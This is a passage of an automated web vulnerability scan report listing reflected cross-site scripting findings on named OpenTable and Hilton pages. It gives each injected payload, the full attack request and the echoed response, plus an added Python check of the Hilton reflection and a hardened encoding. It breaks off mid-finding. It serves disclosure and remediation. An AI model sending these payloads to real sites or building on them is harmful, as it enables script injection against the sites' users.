Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46199


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
'7:00 PM';
ResultProperties.Request.PartySize = 2;
ResultProperties.Request.Action = '';
ResultProperties.Request.DateTime = '10%2f3%2f2011+7%3a00+PM';
ResultProperties.Request.SearchType = 'singlecad25';alert(1)//adac89be721';
ResultProperties.Request.SearchDate = '10%2f3%2f2011+7%3a00+PM';
ResultProperties.Response.ResultsType = 5;
ResultProperties.Response.IsWhiteLabelRestRefSearch = true;
ResultProperties.Response.
...[SNIP]...

4.70. http://www.opentable.com/restaurant-search.aspx [PartySize parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /restaurant-search.aspx

Issue detail

The value of the PartySize request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe644'%3balert(1)//a056217db90 was submitted in the PartySize parameter. This input was echoed as fe644';alert(1)//a056217db90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /restaurant-search.aspx?startDate=10%2F03%2F2011&ResTime=7%3A00+PM&PartySize=2fe644'%3balert(1)//a056217db90&PartySizeFake=2+People&RestaurantID=90&rid=90&GeoID=4&txtDateFormat=MM%2Fdd%2Fyyyy&RestaurantReferralID=90 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:48 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a48&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=B%2b4yJc5Xdhu23AvYwCmwLA%3d%3d&ts=15&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=12111003055335014615&vbefres=6&vbefreg=6&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=B%2b4yJc5Xdhu23AvYwCmwLA%3d%3d&ts=15&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=B%2b4yJc5Xdhu23AvYwCmwLA%3d%3d&ts=15&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Vary: Accept-Encoding
Content-Length: 41421


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
perties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2fe644';alert(1)//a056217db90&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = new Hash({});
Resul
...[SNIP]...

4.71. http://www.opentable.com/restaurant-search.aspx [ResTime parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /restaurant-search.aspx

Issue detail

The value of the ResTime request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78f59'%3balert(1)//1463aa4e794 was submitted in the ResTime parameter. This input was echoed as 78f59';alert(1)//1463aa4e794 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /restaurant-search.aspx?startDate=10%2F03%2F2011&ResTime=7%3A00+PM78f59'%3balert(1)//1463aa4e794&PartySize=2&PartySizeFake=2+People&RestaurantID=90&rid=90&GeoID=4&txtDateFormat=MM%2Fdd%2Fyyyy&RestaurantReferralID=90 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:47 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=px=1&p1=153&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153&c=1&x=10%2f03%2f2011+15%3a54%3a47; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61db9a82a92b72a5a71&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=eCzj5YUpAfxcH5cXHseujw%3d%3d&ts=19&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=12111003055335014615&vbefres=5&vbefreg=5&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Vary: Accept-Encoding
Content-Length: 41839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
alDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM78f59';alert(1)//1463aa4e794&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = new Hash({});
ResultProperties.InResult
...[SNIP]...

4.72. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91473"><img%20src%3da%20onerror%3dalert(1)>34ec6dc532f was submitted in the REST URL parameter 4. This input was echoed as 91473"><img src=a onerror=alert(1)>34ec6dc532f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
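As an added example, not part of the scanner output or of Hilton's code, the following Python reproduces the reflection into the languageLink href shown in the response snippet (the same anchor is the sink in 4.73, 4.74 and 4.75, which differ only in the action name), beside a hardened rendering, and uses the standard library HTML tokenizer as the check: if the payload broke out of the attribute, a second element carrying an on* handler appears. The payload is the one reported above; the render function names are assumptions made for the example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Path segment and action taken from finding 4.72 above (payload included).
SEGMENT = ('BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts91473"'
           '><img src=a onerror=alert(1)>34ec6dc532f')
ACTION = "accommodations.do"


def render_vulnerable(segment, action):
    """Mirrors the response: the raw path segment is dropped into a
    double-quoted href attribute of the Spanish-language link."""
    return '<a href="/es/hi/hotel/%s/%s" class="languageLink">' % (segment, action)


def render_hardened(segment, action):
    """Encode for both contexts, inside-out: percent-encode each path segment
    (URL context), then HTML-attribute-encode the complete href value.
    html.escape is the control that closes this finding; quote() keeps the
    link a valid URL and removes the attribute-breaking characters earlier."""
    href = "/es/hi/hotel/%s/%s" % (quote(segment, safe=""), quote(action, safe=""))
    return '<a href="%s" class="languageLink">' % html.escape(href, quote=True)


class TagCollector(HTMLParser):
    """Records (tag, attributes) as the tokenizer sees them."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup):
    p = TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


def injected_handlers(markup):
    """The check: any element with an on* attribute means the attribute
    boundary was broken, since the template itself emits no handlers."""
    return [(tag, a) for tag, attrs in parse_tags(markup)
            for a in attrs if a.startswith("on")]


if __name__ == "__main__":
    print("vulnerable:", injected_handlers(render_vulnerable(SEGMENT, ACTION)))
    print("hardened:  ", injected_handlers(render_hardened(SEGMENT, ACTION)))
```

The vulnerable markup tokenizes into an anchor whose href is cut off at the injected quote, followed by an `<img>` element with an `onerror` handler, which is the event-handler execution the finding describes. The hardened markup tokenizes into a single anchor whose href still carries the attacker's text, now inert as `%22%3E%3Cimg...`.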

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts91473"><img%20src%3da%20onerror%3dalert(1)>34ec6dc532f/accommodations.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:06:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:17:46 GMT;path=/
Content-Length: 55438


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<a href="/es/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts91473"><img src=a onerror=alert(1)>34ec6dc532f/accommodations.do" class="languageLink">
...[SNIP]...

4.73. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7531"><img%20src%3da%20onerror%3dalert(1)>d0da59357ed was submitted in the REST URL parameter 4. This input was echoed as f7531"><img src=a onerror=alert(1)>d0da59357ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusettsf7531"><img%20src%3da%20onerror%3dalert(1)>d0da59357ed/dining.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:06:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:17:59 GMT;path=/
Content-Length: 49103


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<a href="/es/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusettsf7531"><img src=a onerror=alert(1)>d0da59357ed/dining.do" class="languageLink">
...[SNIP]...

4.74. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do

Issue detail

